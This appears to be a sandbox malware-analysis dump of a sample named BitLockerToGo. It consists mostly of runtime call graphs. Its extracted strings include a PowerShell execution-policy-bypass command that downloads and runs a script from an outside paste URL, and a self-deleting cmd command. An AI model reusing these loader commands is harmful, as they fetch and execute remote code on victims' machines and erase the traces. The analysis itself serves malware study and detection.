6e671c 14 API calls 12005 6e67d5 12004->12005 12035 6ebaf0 12005->12035 12008 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12009 6e4a23 12008->12009 12010 6e4a4b 12009->12010 12309 6e49e8 LeaveCriticalSection 12010->12309 12012 6e4a34 12012->11987 12039 6eba07 12013->12039 12015 6eba56 12016 6ebab8 12015->12016 12017 6ea7cc __strnicoll 15 API calls 12015->12017 12016->12001 12018 6ebaaf 12017->12018 12019 6e9d6f __freea 14 API calls 12018->12019 12019->12016 12063 6e8256 12020->12063 12023 6e6af4 12025 6e876d __strnicoll 29 API calls 12023->12025 12024 6e67c8 12024->12004 12025->12024 12028 6e81e0 ___scrt_uninitialize_crt 41 API calls 12030 6e6b1c 12028->12030 12030->12024 12030->12028 12031 6e6d10 12030->12031 12069 6e69dc 12030->12069 12072 6e6fba 12030->12072 12106 6e729d 12030->12106 12032 6e876d __strnicoll 29 API calls 12031->12032 12033 6e6d2a 12032->12033 12034 6e876d __strnicoll 29 API calls 12033->12034 12034->12024 12036 6ebafb 12035->12036 12038 6e67e2 12035->12038 12036->12038 12211 6ea4c3 12036->12211 12038->12008 12042 6eba13 12039->12042 12040 6eba41 12040->12015 12041 6eba3d 12041->12015 12042->12040 12042->12041 12047 6eb99e 12042->12047 12044 6eba2e 12054 6f1d1f 12044->12054 12046 6eba34 12046->12015 12048 6eb9bf 12047->12048 12049 6eb9aa 12047->12049 12048->12044 12050 6e9cff __strnicoll 14 API calls 12049->12050 12051 6eb9af 12050->12051 12052 6e87ea __strnicoll 41 API calls 12051->12052 12053 6eb9ba 12052->12053 12053->12044 12055 6f1d2c 12054->12055 12056 6f1d39 12054->12056 12057 6e9cff __strnicoll 14 API calls 12055->12057 12059 6f1d45 12056->12059 12060 6e9cff __strnicoll 14 API calls 12056->12060 12058 6f1d31 12057->12058 12058->12046 12059->12046 12061 6f1d66 12060->12061 12062 6e87ea __strnicoll 41 API calls 12061->12062 12062->12058 12064 6e8283 12063->12064 12065 6e8261 12063->12065 12135 6e82bf 12064->12135 12066 6e876d __strnicoll 29 API calls 12065->12066 12068 6e6ae9 12066->12068 12068->12023 12068->12024 12068->12030 12143 6e4dc1 12069->12143 12071 6e6a17 12071->12030 12073 6e6fd8 12072->12073 12074 6e6fc1 12072->12074 12075 6e876d __strnicoll 29 API calls 12073->12075 12087 6e7017 12073->12087 12076 6e732d 12074->12076 12077 6e72c1 12074->12077 12074->12087 12078 6e700c 12075->12078 12081 6e736c 12076->12081 12082 6e7332 12076->12082 12079 6e72c7 12077->12079 12080 6e7355 12077->12080 12078->12030 12093 6e7322 12079->12093 12094 6e72cc 12079->12094 12180 6e58e0 12080->12180 12083 6e738b 12081->12083 12084 6e7371 12081->12084 12085 6e7334 12082->12085 12086 6e7363 12082->12086 12191 6e8021 12083->12191 12084->12080 12084->12093 12104 6e72f4 12084->12104 12088 6e72db 12085->12088 12095 6e7343 12085->12095 12187 6e7fe7 12086->12187 12087->12030 12105 6e7396 12088->12105 12159 6e7aed 12088->12159 12093->12105 12173 6e5bff 12093->12173 12094->12088 12096 6e7307 12094->12096 12094->12104 12095->12080 12098 6e7347 12095->12098 12096->12105 12169 6e7e25 12096->12169 12102 6e7f62 29 API calls 12098->12102 12098->12105 12100 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12101 6e75dd 12100->12101 12101->12030 12102->12104 12104->12105 12194 6eb701 12104->12194 12105->12100 12107 6e732d 12106->12107 12108 6e72c1 12106->12108 12111 6e736c 12107->12111 12112 6e7332 12107->12112 12109 6e72c7 12108->12109 12110 6e7355 12108->12110 12121 6e7322 12109->12121 12122 6e72cc 12109->12122 12119 6e58e0 30 API calls 12110->12119 12113 6e738b 12111->12113 12114 6e7371 12111->12114 12115 6e7334 12112->12115 12116 6e7363 12112->12116 12118 6e8021 30 API calls 12113->12118 12114->12110 12114->12121 12133 6e72f4 12114->12133 12117 6e72db 12115->12117 12124 6e7343 12115->12124 12120 6e7fe7 30 API calls 12116->12120 12123 6e7aed 44 API calls 12117->12123 12134 6e7396 12117->12134 12118->12133 12119->12133 12120->12133 12126 6e5bff 30 API calls 12121->12126 12121->12134 12122->12117 12125 6e7307 12122->12125 12122->12133 12123->12133 12124->12110 12127 6e7347 12124->12127 12128 6e7e25 43 API calls 12125->12128 12125->12134 12126->12133 12131 6e7f62 29 API calls 12127->12131 12127->12134 12128->12133 12129 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12130 6e75dd 12129->12130 12130->12030 12131->12133 12132 6eb701 43 API calls 12132->12133 12133->12132 12133->12134 12134->12129 12136 6e82d3 12135->12136 12137 6e833d 12135->12137 12138 6eb99e ___scrt_uninitialize_crt 41 API calls 12136->12138 12137->12068 12139 6e82da 12138->12139 12139->12137 12140 6e9cff __strnicoll 14 API calls 12139->12140 12141 6e8332 12140->12141 12142 6e87ea __strnicoll 41 API calls 12141->12142 12142->12137 12144 6e823b 41 API calls 12143->12144 12146 6e4dd3 12144->12146 12145 6e4de8 12147 6e876d __strnicoll 29 API calls 12145->12147 12146->12145 12150 6e4e1b 12146->12150 12152 6e4e03 12146->12152 12147->12152 12148 6e4eb2 12149 6e8188 41 API calls 12148->12149 12149->12152 12150->12148 12153 6e8188 12150->12153 12152->12071 12154 6e81ad 12153->12154 12155 6e8199 12153->12155 12154->12148 12155->12154 12156 6e9cff __strnicoll 14 API calls 12155->12156 12157 6e81a2 12156->12157 12158 6e87ea __strnicoll 41 API calls 12157->12158 12158->12154 12160 6e7b07 12159->12160 12161 6e4c0b 15 API calls 12160->12161 12162 6e7b46 12161->12162 12163 6eb580 43 API calls 12162->12163 12164 6e7bd9 12163->12164 12165 6e7bfd 12164->12165 12166 6e81e0 ___scrt_uninitialize_crt 41 API calls 12164->12166 12167 6e81e0 ___scrt_uninitialize_crt 41 API calls 12165->12167 12168 6e7c30 12165->12168 12166->12165 12167->12168 12168->12104 12168->12168 12170 6e7e40 12169->12170 12171 6e7e76 12170->12171 12172 6eb701 43 API calls 12170->12172 12171->12104 12172->12171 12174 6e5c14 12173->12174 12175 6e5c36 12174->12175 12177 6e5c5d 12174->12177 12176 6e876d __strnicoll 29 API calls 12175->12176 12179 6e5c53 12176->12179 12178 6e4c0b 15 API calls 12177->12178 12177->12179 12178->12179 12179->12104 12181 6e58f5 12180->12181 12182 6e5917 12181->12182 12184 6e593e 12181->12184 12183 6e876d __strnicoll 29 API calls 12182->12183 12186 6e5934 12183->12186 12185 6e4c0b 15 API calls 12184->12185 12184->12186 12185->12186 12186->12104 12188 6e7ff3 12187->12188 12204 6e55c1 12188->12204 12190 6e8003 12190->12104 12192 6e5bff 30 API calls 12191->12192 12193 6e8036 12192->12193 12193->12104 12196 6eb716 12194->12196 12195 6eb757 12199 6eb743 __FrameHandler3::FrameUnwindToState 12195->12199 12200 6ed5bc ___scrt_uninitialize_crt WideCharToMultiByte 12195->12200 12203 6eb71a __FrameHandler3::FrameUnwindToState 12195->12203 12196->12195 12198 6e81e0 ___scrt_uninitialize_crt 41 API calls 12196->12198 12196->12199 12196->12203 12197 6e876d __strnicoll 29 API calls 12197->12203 12198->12195 12199->12197 12199->12203 12201 6eb812 12200->12201 12202 6eb828 GetLastError 12201->12202 12201->12203 12202->12199 12202->12203 12203->12104 12205 6e55d6 12204->12205 12206 6e55f8 12205->12206 12208 6e561f 12205->12208 12207 6e876d __strnicoll 29 API calls 12206->12207 12210 6e5615 12207->12210 12209 6e4c0b 15 API calls 12208->12209 12208->12210 12209->12210 12210->12190 12212 6ea4dc 12211->12212 12213 6ea503 12211->12213 12212->12213 12214 6eb99e ___scrt_uninitialize_crt 41 API calls 12212->12214 12213->12038 12215 6ea4f8 12214->12215 12217 6ef925 12215->12217 12219 6ef931 __FrameHandler3::FrameUnwindToState 12217->12219 12218 6ef939 12218->12213 12219->12218 12220 6ef972 12219->12220 12222 6ef9b8 12219->12222 12221 6e876d __strnicoll 29 API calls 12220->12221 12221->12218 12228 6edcc3 EnterCriticalSection 12222->12228 12224 6ef9be 12226 6ef9dc 12224->12226 12229 6efa36 12224->12229 12255 6efa2e 12226->12255 12228->12224 12230 6efa5e 12229->12230 12250 6efa81 ___scrt_uninitialize_crt 12229->12250 12231 6efa62 12230->12231 12233 6efabd 12230->12233 12232 6e876d __strnicoll 29 API calls 12231->12232 12232->12250 12234 6efadb 12233->12234 12258 6f2de7 12233->12258 12261 6ef5b2 12234->12261 12238 6efb3a 12242 6efb4e 12238->12242 12243 6efba3 WriteFile 12238->12243 12239 6efaf3 12240 6efafb 12239->12240 12241 6efb22 12239->12241 12240->12250 12268 6ef54a 12240->12268 12273 6ef183 GetConsoleOutputCP 12241->12273 12244 6efb8f 12242->12244 12245 6efb56 12242->12245 12247 6efbc5 GetLastError 12243->12247 12243->12250 12301 6ef62f 12244->12301 12248 6efb7b 12245->12248 12249 6efb5b 12245->12249 12247->12250 12293 6ef7f3 12248->12293 12249->12250 12286 6ef70a 12249->12286 12250->12226 12308 6edce6 LeaveCriticalSection 12255->12308 12257 6efa34 12257->12218 12259 6f2d24 ___scrt_uninitialize_crt 43 API calls 12258->12259 12260 6f2e00 12259->12260 12260->12234 12262 6f1d1f ___scrt_uninitialize_crt 41 API calls 12261->12262 12264 6ef5c4 12262->12264 12263 6ef628 12263->12238 12263->12239 12264->12263 12265 6ef5f2 12264->12265 12266 6e81e0 ___scrt_uninitialize_crt 41 API calls 12264->12266 12265->12263 12267 6ef60c GetConsoleMode 12265->12267 12266->12265 12267->12263 12269 6ef56c 12268->12269 12270 6ef5a1 12268->12270 12269->12270 12271 6f2e05 5 API calls ___scrt_uninitialize_crt 12269->12271 12272 6ef5a3 GetLastError 12269->12272 12270->12250 12271->12269 12272->12270 12274 6ef1f5 12273->12274 12278 6ef1fc __InternalCxxFrameHandler 12273->12278 12275 6e81e0 ___scrt_uninitialize_crt 41 API calls 12274->12275 12275->12278 12276 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12277 6ef543 12276->12277 12277->12250 12279 6eb86b 42 API calls ___scrt_uninitialize_crt 12278->12279 12280 6ef4b2 12278->12280 12281 6ed5bc ___scrt_uninitialize_crt WideCharToMultiByte 12278->12281 12282 6ef42b WriteFile 12278->12282 12284 6f19bf 5 API calls ___scrt_uninitialize_crt 12278->12284 12285 6ef469 WriteFile 12278->12285 12279->12278 12280->12276 12281->12278 12282->12278 12283 6ef521 GetLastError 12282->12283 12283->12280 12284->12278 12285->12278 12285->12283 12290 6ef719 ___scrt_uninitialize_crt 12286->12290 12287 6ef7d8 12289 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12287->12289 12288 6ef78e WriteFile 12288->12290 12291 6ef7da GetLastError 12288->12291 12292 6ef7f1 12289->12292 12290->12287 12290->12288 12291->12287 12292->12250 12300 6ef802 ___scrt_uninitialize_crt 12293->12300 12294 6ef90a 12295 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12294->12295 12296 6ef923 12295->12296 12296->12250 12297 6ed5bc ___scrt_uninitialize_crt WideCharToMultiByte 12297->12300 12298 6ef90c GetLastError 12298->12294 12299 6ef8c1 WriteFile 12299->12298 12299->12300 12300->12294 12300->12297 12300->12298 12300->12299 12302 6ef63e ___scrt_uninitialize_crt 12301->12302 12305 6ef6ae WriteFile 12302->12305 12307 6ef6ef 12302->12307 12303 6e1b47 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 12304 6ef708 12303->12304 12304->12250 12305->12302 12306 6ef6f1 GetLastError 12305->12306 12306->12307 12307->12303 12308->12257 12309->12012 12330 6e186a 12310->12330 12313 6e2bf5 std::_Xinvalid_argument RaiseException 12314 6e18f5 12313->12314 12333 6e9391 12314->12333 12316 6e1909 12340 6e1c65 12316->12340 12318 6e197b 12319 6e1f1a 4 API calls 12318->12319 12329 6e1998 12318->12329 12321 6e19a0 12319->12321 12320 6e191e __RTC_Initialize 12320->12318 12346 6e1df2 12320->12346 12321->11510 12323 6e1937 12323->12318 12349 6e1eac InitializeSListHead 12323->12349 12325 6e194d 12350 6e1ebb 12325->12350 12327 6e1970 12356 6e9493 12327->12356 12329->11510 12331 6e17c5 std::exception::exception 41 API calls 12330->12331 12332 6e187c 12331->12332 12332->12313 12334 6e93c3 12333->12334 12335 6e93a0 12333->12335 12334->12316 12335->12334 12336 6e9cff __strnicoll 14 API calls 12335->12336 12337 6e93b3 12336->12337 12338 6e87ea __strnicoll 41 API calls 12337->12338 12339 6e93be 12338->12339 12339->12316 12341 6e1c71 12340->12341 12342 6e1c75 12340->12342 12341->12320 12343 6e1f1a 4 API calls 12342->12343 12345 6e1c82 ___scrt_release_startup_lock 12342->12345 12344 6e1ceb 12343->12344 12345->12320 12363 6e1dc5 12346->12363 12349->12325 12426 6e9a4d 12350->12426 12352 6e1ecc 12353 6e1ed3 12352->12353 12354 6e1f1a 4 API calls 12352->12354 12353->12327 12355 6e1edb 12354->12355 12355->12327 12357 6ebe6c _unexpected 41 API calls 12356->12357 12358 6e949e 12357->12358 12359 6e94d6 12358->12359 12360 6e9cff __strnicoll 14 API calls 12358->12360 12359->12318 12361 6e94cb 12360->12361 12362 6e87ea __strnicoll 41 API calls 12361->12362 12362->12359 12364 6e1ddb 12363->12364 12365 6e1dd4 12363->12365 12372 6e98dd 12364->12372 12369 6e9860 12365->12369 12368 6e1dd9 12368->12323 12370 6e98dd 44 API calls 12369->12370 12371 6e9872 12370->12371 12371->12368 12375 6e9629 12372->12375 12376 6e9635 __FrameHandler3::FrameUnwindToState 12375->12376 12383 6edaca EnterCriticalSection 12376->12383 12378 6e9643 12384 6e9684 12378->12384 12380 6e9650 12394 6e9678 12380->12394 12383->12378 12385 6e969f 12384->12385 12386 6e9712 __dosmaperr 12384->12386 12385->12386 12387 6e96f2 12385->12387 12397 6ee545 12385->12397 12386->12380 12387->12386 12389 6ee545 44 API calls 12387->12389 12391 6e9708 12389->12391 12390 6e96e8 12392 6e9d6f __freea 14 API calls 12390->12392 12393 6e9d6f __freea 14 API calls 12391->12393 12392->12387 12393->12386 12425 6edb12 LeaveCriticalSection 12394->12425 12396 6e9661 12396->12368 12398 6ee56d 12397->12398 12399 6ee552 12397->12399 12401 6ee57c 12398->12401 12406 6f2830 12398->12406 12399->12398 12400 6ee55e 12399->12400 12402 6e9cff __strnicoll 14 API calls 12400->12402 12413 6f2863 12401->12413 12405 6ee563 __FrameHandler3::FrameUnwindToState 12402->12405 12405->12390 12407 6f283b 12406->12407 12408 6f2850 HeapSize 12406->12408 12409 6e9cff __strnicoll 14 API calls 12407->12409 12408->12401 12410 6f2840 12409->12410 12411 6e87ea __strnicoll 41 API calls 12410->12411 12412 6f284b 12411->12412 12412->12401 12414 6f287b 12413->12414 12415 6f2870 12413->12415 12417 6f2883 12414->12417 12424 6f288c __dosmaperr 12414->12424 12416 6ea7cc __strnicoll 15 API calls 12415->12416 12422 6f2878 12416->12422 12418 6e9d6f __freea 14 API calls 12417->12418 12418->12422 12419 6f28b6 HeapReAlloc 12419->12422 12419->12424 12420 6f2891 12421 6e9cff __strnicoll 14 API calls 12420->12421 12421->12422 12422->12405 12423 6e9540 __dosmaperr EnterCriticalSection LeaveCriticalSection 12423->12424 12424->12419 12424->12420 12424->12423 12425->12396 12427 6e9a6b 12426->12427 12431 6e9a8b 12426->12431 12428 6e9cff __strnicoll 14 API calls 12427->12428 12429 6e9a81 12428->12429 12430 6e87ea __strnicoll 41 API calls 12429->12430 12430->12431 12431->12352 12433 6e91ee 12432->12433 12434 6e91dc 12432->12434 12444 6e905f 12433->12444 12435 6e2034 __FrameHandler3::FrameUnwindToState GetModuleHandleW 12434->12435 12437 6e91e1 12435->12437 12437->12433 12459 6e9290 GetModuleHandleExW 12437->12459 12439 6e1b34 12439->10731 12443 6e9240 12445 6e906b __FrameHandler3::FrameUnwindToState 12444->12445 12465 6edaca EnterCriticalSection 12445->12465 12447 6e9075 12466 6e90c7 12447->12466 12449 6e9082 12470 6e90a0 12449->12470 12452 6e9246 12495 6e9277 12452->12495 12454 6e9250 12455 6e9264 12454->12455 12456 6e9254 GetCurrentProcess TerminateProcess 12454->12456 12457 6e9290 __FrameHandler3::FrameUnwindToState 3 API calls 12455->12457 12456->12455 12458 6e926c ExitProcess 12457->12458 12460 6e92cf GetProcAddress 12459->12460 12461 6e92f0 12459->12461 12460->12461 12462 6e92e3 12460->12462 12463 6e91ed 12461->12463 12464 6e92f6 FreeLibrary 12461->12464 12462->12461 12463->12433 12464->12463 12465->12447 12467 6e90d3 __FrameHandler3::FrameUnwindToState 12466->12467 12469 6e9137 __FrameHandler3::FrameUnwindToState 12467->12469 12473 6e9876 12467->12473 12469->12449 12494 6edb12 LeaveCriticalSection 12470->12494 12472 6e908e 12472->12439 12472->12452 12474 6e9882 __EH_prolog3 12473->12474 12477 6e95ce 12474->12477 12476 6e98a9 __FrameHandler3::FrameUnwindToState 12476->12469 12478 6e95da __FrameHandler3::FrameUnwindToState 12477->12478 12485 6edaca EnterCriticalSection 12478->12485 12480 6e95e8 12486 6e9786 12480->12486 12485->12480 12487 6e95f5 12486->12487 12488 6e97a5 12486->12488 12490 6e961d 12487->12490 12488->12487 12489 6e9d6f __freea 14 API calls 12488->12489 12489->12487 12493 6edb12 LeaveCriticalSection 12490->12493 12492 6e9606 12492->12476 12493->12492 12494->12472 12498 6edb4e 12495->12498 12497 6e927c __FrameHandler3::FrameUnwindToState 12497->12454 12499 6edb5d __FrameHandler3::FrameUnwindToState 12498->12499 12500 6edb6a 12499->12500 12502 6e9f61 12499->12502 12500->12497 12503 6e9edc __dosmaperr 5 API calls 12502->12503 12504 6e9f7d 12503->12504 12504->12500 12506 6e9a3a ___scrt_uninitialize_crt 12505->12506 12507 6e9a28 12505->12507 12506->10725 12508 6e9a36 12507->12508 12510 6ea591 12507->12510 12508->10725 12513 6ea422 12510->12513 12516 6ea376 12513->12516 12517 6ea382 __FrameHandler3::FrameUnwindToState 12516->12517 12524 6edaca EnterCriticalSection 12517->12524 12519 6ea38c ___scrt_uninitialize_crt 12520 6ea3f8 12519->12520 12525 6ea2ea 12519->12525 12533 6ea416 12520->12533 12524->12519 12526 6ea2f6 __FrameHandler3::FrameUnwindToState 12525->12526 12536 6e49d4 EnterCriticalSection 12526->12536 12528 6ea300 ___scrt_uninitialize_crt 12529 6ea339 12528->12529 12537 6ea52c 12528->12537 12550 6ea36a 12529->12550 12598 6edb12 LeaveCriticalSection 12533->12598 12535 6ea404 12535->12508 12536->12528 12538 6ea541 __strnicoll 12537->12538 12539 6ea548 12538->12539 12540 6ea553 12538->12540 12541 6ea422 ___scrt_uninitialize_crt 70 API calls 12539->12541 12542 6ea4c3 ___scrt_uninitialize_crt 66 API calls 12540->12542 12549 6ea54e 12541->12549 12543 6ea55d 12542->12543 12546 6eb99e ___scrt_uninitialize_crt 41 API calls 12543->12546 12543->12549 12544 6e66e0 __strnicoll 41 API calls 12545 6ea58b 12544->12545 12545->12529 12547 6ea574 12546->12547 12553 6ef106 12547->12553 12549->12544 12597 6e49e8 LeaveCriticalSection 12550->12597 12552 6ea358 12552->12519 12554 6ef117 12553->12554 12557 6ef124 12553->12557 12555 6e9cff __strnicoll 14 API calls 12554->12555 12563 6ef11c 12555->12563 12556 6ef16d 12558 6e9cff __strnicoll 14 API calls 12556->12558 12557->12556 12559 6ef14b 12557->12559 12560 6ef172 12558->12560 12564 6ef064 12559->12564 12562 6e87ea __strnicoll 41 API calls 12560->12562 12562->12563 12563->12549 12565 6ef070 __FrameHandler3::FrameUnwindToState 12564->12565 12577 6edcc3 EnterCriticalSection 12565->12577 12567 6ef07f 12575 6ef0c4 12567->12575 12578 6edd9a 12567->12578 12568 6e9cff __strnicoll 14 API calls 12571 6ef0cb 12568->12571 12570 6ef0ab FlushFileBuffers 12570->12571 12572 6ef0b7 GetLastError 12570->12572 12594 6ef0fa 12571->12594 12591 6e9cec 12572->12591 12575->12568 12577->12567 12579 6eddbc 12578->12579 12580 6edda7 12578->12580 12582 6e9cec __dosmaperr 14 API calls 12579->12582 12584 6edde1 12579->12584 12581 6e9cec __dosmaperr 14 API calls 12580->12581 12583 6eddac 12581->12583 12585 6eddec 12582->12585 12586 6e9cff __strnicoll 14 API calls 12583->12586 12584->12570 12587 6e9cff __strnicoll 14 API calls 12585->12587 12588 6eddb4 12586->12588 12589 6eddf4 12587->12589 12588->12570 12590 6e87ea __strnicoll 41 API calls 12589->12590 12590->12588 12592 6ebfbd __dosmaperr 14 API calls 12591->12592 12593 6e9cf1 12592->12593 12593->12575 12595 6edce6 ___scrt_uninitialize_crt LeaveCriticalSection 12594->12595 12596 6ef0e3 12595->12596 12596->12563 12597->12552 12598->12535 12920 6ebd33 12921 6ebd3e 12920->12921 12922 6ebd4e 12920->12922 12926 6ebd54 12921->12926 12925 6e9d6f __freea 14 API calls 12925->12922 12927 6ebd69 12926->12927 12928 6ebd6f 12926->12928 12929 6e9d6f __freea 14 API calls 12927->12929 12930 6e9d6f __freea 14 API calls 12928->12930 12929->12928 12931 6ebd7b 12930->12931 12932 6e9d6f __freea 14 API calls 12931->12932 12933 6ebd86 12932->12933 12934 6e9d6f __freea 14 API calls 12933->12934 12935 6ebd91 12934->12935 12936 6e9d6f __freea 14 API calls 12935->12936 12937 6ebd9c 12936->12937 12938 6e9d6f __freea 14 API calls 12937->12938 12939 6ebda7 12938->12939 12940 6e9d6f __freea 14 API calls 12939->12940 12941 6ebdb2 12940->12941 12942 6e9d6f __freea 14 API calls 12941->12942 12943 6ebdbd 12942->12943 12944 6e9d6f __freea 14 API calls 12943->12944 12945 6ebdc8 12944->12945 12946 6e9d6f __freea 14 API calls 12945->12946 12947 6ebdd6 12946->12947 12952 6ebb80 12947->12952 12953 6ebb8c __FrameHandler3::FrameUnwindToState 12952->12953 12968 6edaca EnterCriticalSection 12953->12968 12957 6ebb96 12958 6e9d6f __freea 14 API calls 12957->12958 12959 6ebbc0 12957->12959 12958->12959 12969 6ebbdf 12959->12969 12960 6ebbeb 12961 6ebbf7 __FrameHandler3::FrameUnwindToState 12960->12961 12973 6edaca EnterCriticalSection 12961->12973 12963 6ebc01 12964 6ebe21 __dosmaperr 14 API calls 12963->12964 12965 6ebc14 12964->12965 12974 6ebc34 12965->12974 12968->12957 12972 6edb12 LeaveCriticalSection 12969->12972 12971 6ebbcd 12971->12960 12972->12971 12973->12963 12977 6edb12 LeaveCriticalSection 12974->12977 12976 6ebc22 12976->12925 12977->12976 13818 6e4988 13819 6ea591 ___scrt_uninitialize_crt 70 API calls 13818->13819 13820 6e4990 13819->13820 13828 6ea23f 13820->13828 13822 6e4995 13838 6ea59a 13822->13838 13825 6e49bf 13826 6e9d6f __freea 14 API calls 13825->13826 13827 6e49ca 13826->13827 13829 6ea24b __FrameHandler3::FrameUnwindToState 13828->13829 13842 6edaca EnterCriticalSection 13829->13842 13831 6ea2c2 13849 6ea2e1 13831->13849 13833 6ea256 13833->13831 13835 6ea296 DeleteCriticalSection 13833->13835 13843 6ef034 13833->13843 13836 6e9d6f __freea 14 API calls 13835->13836 13836->13833 13839 6e49a4 DeleteCriticalSection 13838->13839 13840 6ea5b1 13838->13840 13839->13822 13839->13825 13840->13839 13841 6e9d6f __freea 14 API calls 13840->13841 13841->13839 13842->13833 13844 6ef047 __strnicoll 13843->13844 13852 6eef0f 13844->13852 13846 6ef053 13847 6e66e0 __strnicoll 41 API calls 13846->13847 13848 6ef05f 13847->13848 13848->13833 13924 6edb12 LeaveCriticalSection 13849->13924 13851 6ea2ce 13851->13822 13853 6eef1b __FrameHandler3::FrameUnwindToState 13852->13853 13854 6eef48 13853->13854 13855 6eef25 13853->13855 13858 6eef40 13854->13858 13863 6e49d4 EnterCriticalSection 13854->13863 13856 6e876d __strnicoll 29 API calls 13855->13856 13856->13858 13858->13846 13859 6eef66 13864 6eefa6 13859->13864 13861 6eef73 13878 6eef9e 13861->13878 13863->13859 13865 6eefd6 13864->13865 13866 6eefb3 13864->13866 13868 6ea4c3 ___scrt_uninitialize_crt 66 API calls 13865->13868 13876 6eefce 13865->13876 13867 6e876d __strnicoll 29 API calls 13866->13867 13867->13876 13869 6eefee 13868->13869 13870 6ea59a 14 API calls 13869->13870 13871 6eeff6 13870->13871 13872 6eb99e ___scrt_uninitialize_crt 41 API calls 13871->13872 13873 6ef002 13872->13873 13881 6f2a81 13873->13881 13876->13861 13877 6e9d6f __freea 14 API calls 13877->13876 13923 6e49e8 LeaveCriticalSection 13878->13923 13880 6eefa4 13880->13858 13882 6f2aaa 13881->13882 13883 6ef009 13881->13883 13884 6f2af9 13882->13884 13886 6f2ad1 13882->13886 13883->13876 13883->13877 13885 6e876d __strnicoll 29 API calls 13884->13885 13885->13883 13888 6f29f0 13886->13888 13889 6f29fc __FrameHandler3::FrameUnwindToState 13888->13889 13896 6edcc3 EnterCriticalSection 13889->13896 13891 6f2a0a 13894 6f2a3b 13891->13894 13897 6f2b24 13891->13897 13910 6f2a75 13894->13910 13896->13891 13898 6edd9a ___scrt_uninitialize_crt 41 API calls 13897->13898 13901 6f2b34 13898->13901 13899 6f2b3a 13913 6edd09 13899->13913 13901->13899 13902 6f2b6c 13901->13902 13903 6edd9a ___scrt_uninitialize_crt 41 API calls 13901->13903 13902->13899 13904 6edd9a ___scrt_uninitialize_crt 41 API calls 13902->13904 13905 6f2b63 13903->13905 13906 6f2b78 CloseHandle 13904->13906 13907 6edd9a ___scrt_uninitialize_crt 41 API calls 13905->13907 13906->13899 13908 6f2b84 GetLastError 13906->13908 13907->13902 13908->13899 13909 6f2b92 ___scrt_uninitialize_crt 13909->13894 13922 6edce6 LeaveCriticalSection 13910->13922 13912 6f2a5e 13912->13883 13914 6edd7f 13913->13914 13915 6edd18 13913->13915 13916 6e9cff __strnicoll 14 API calls 13914->13916 13915->13914 13920 6edd42 13915->13920 13917 6edd84 13916->13917 13918 6e9cec __dosmaperr 14 API calls 13917->13918 13919 6edd6f 13918->13919 13919->13909 13920->13919 13921 6edd69 SetStdHandle 13920->13921 13921->13919 13922->13912 13923->13880 13924->13851

                                        Control-flow Graph

                                        APIs
                                        • CreateProcessA.KERNELBASE(00000000,97F6FAD1,00000000,00000000,00000001,08000000,00000000,00000000,00000044,?,97F6FAD1), ref: 006E135D
                                        • GetLastError.KERNEL32 ref: 006E146A
                                        • Sleep.KERNELBASE(000003E8), ref: 006E1483
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 006E14B4
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 006E1500
                                        • CloseHandle.KERNELBASE(?), ref: 006E1512
                                        • CloseHandle.KERNEL32(?), ref: 006E151A
                                        Strings
                                        • powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )" , xrefs: 006E124F
                                        • cmd.exe /c del /f /q "%s", xrefs: 006E14C1
                                        • D, xrefs: 006E1314
                                        • CreateProcess failed (%d)., xrefs: 006E1471
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.1672755954.00000000006E1000.00000020.00000400.00020000.00000000.sdmp, Offset: 006E0000, based on PE: true
                                        • Associated: 00000002.00000002.1672730017.00000000006E0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672785441.00000000006F6000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672809415.00000000006FE000.00000040.00000400.00020000.00000000.sdmpDownload File
                                        • Associated: 00000002.00000002.1672834168.0000000000700000.00000002.00000400.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_6e0000_BitLockerToGo.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess$ErrorFileLastModuleNameSleep
                                        • String ID: CreateProcess failed (%d).$D$cmd.exe /c del /f /q "%s"$powershell -ep bypass "Invoke-Command -ScriptBlock ( [ScriptBlock]::Create( ( Invoke-WebRequest -UseBasicParsing -URI "https://paste.ee/d/7BWJv" ) ) )"
                                        • API String ID: 2671085826-1110349582
                                        • Opcode ID: 13e555dfb9c137fac58e97c3fd97f40b801e17f94db6c4bfe7be41a9cebd6c19
                                        • Instruction ID: 3655aa7cd5e11f13f2c70eab50faf392e7591f184dfce833bb306f7ec15cbec7
                                        • Opcode Fuzzy Hash: 13e555dfb9c137fac58e97c3fd97f40b801e17f94db6c4bfe7be41a9cebd6c19
                                        • Instruction Fuzzy Hash: 79A1F5B1A013689FDB289F25CC45BEDB377AB85710F244299F209AB2C1DB715ED09F44

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 73 6e9e11-6e9e1d 74 6e9eaf-6e9eb2 73->74 75 6e9eb8 74->75 76 6e9e22-6e9e33 74->76 77 6e9eba-6e9ebe 75->77 78 6e9e35-6e9e38 76->78 79 6e9e40-6e9e59 LoadLibraryExW 76->79 80 6e9e3e 78->80 81 6e9ed8-6e9eda 78->81 82 6e9ebf-6e9ecf 79->82 83 6e9e5b-6e9e64 GetLastError 79->83 85 6e9eac 80->85 81->77 82->81 84 6e9ed1-6e9ed2 FreeLibrary 82->84 86 6e9e9d-6e9eaa 83->86 87 6e9e66-6e9e78 call 6e9c28 83->87 84->81 85->74 86->85 87->86 90 6e9e7a-6e9e8c call 6e9c28 87->90 90->86 93 6e9e8e-6e9e9b LoadLibraryExW 90->93 93->82 93->86
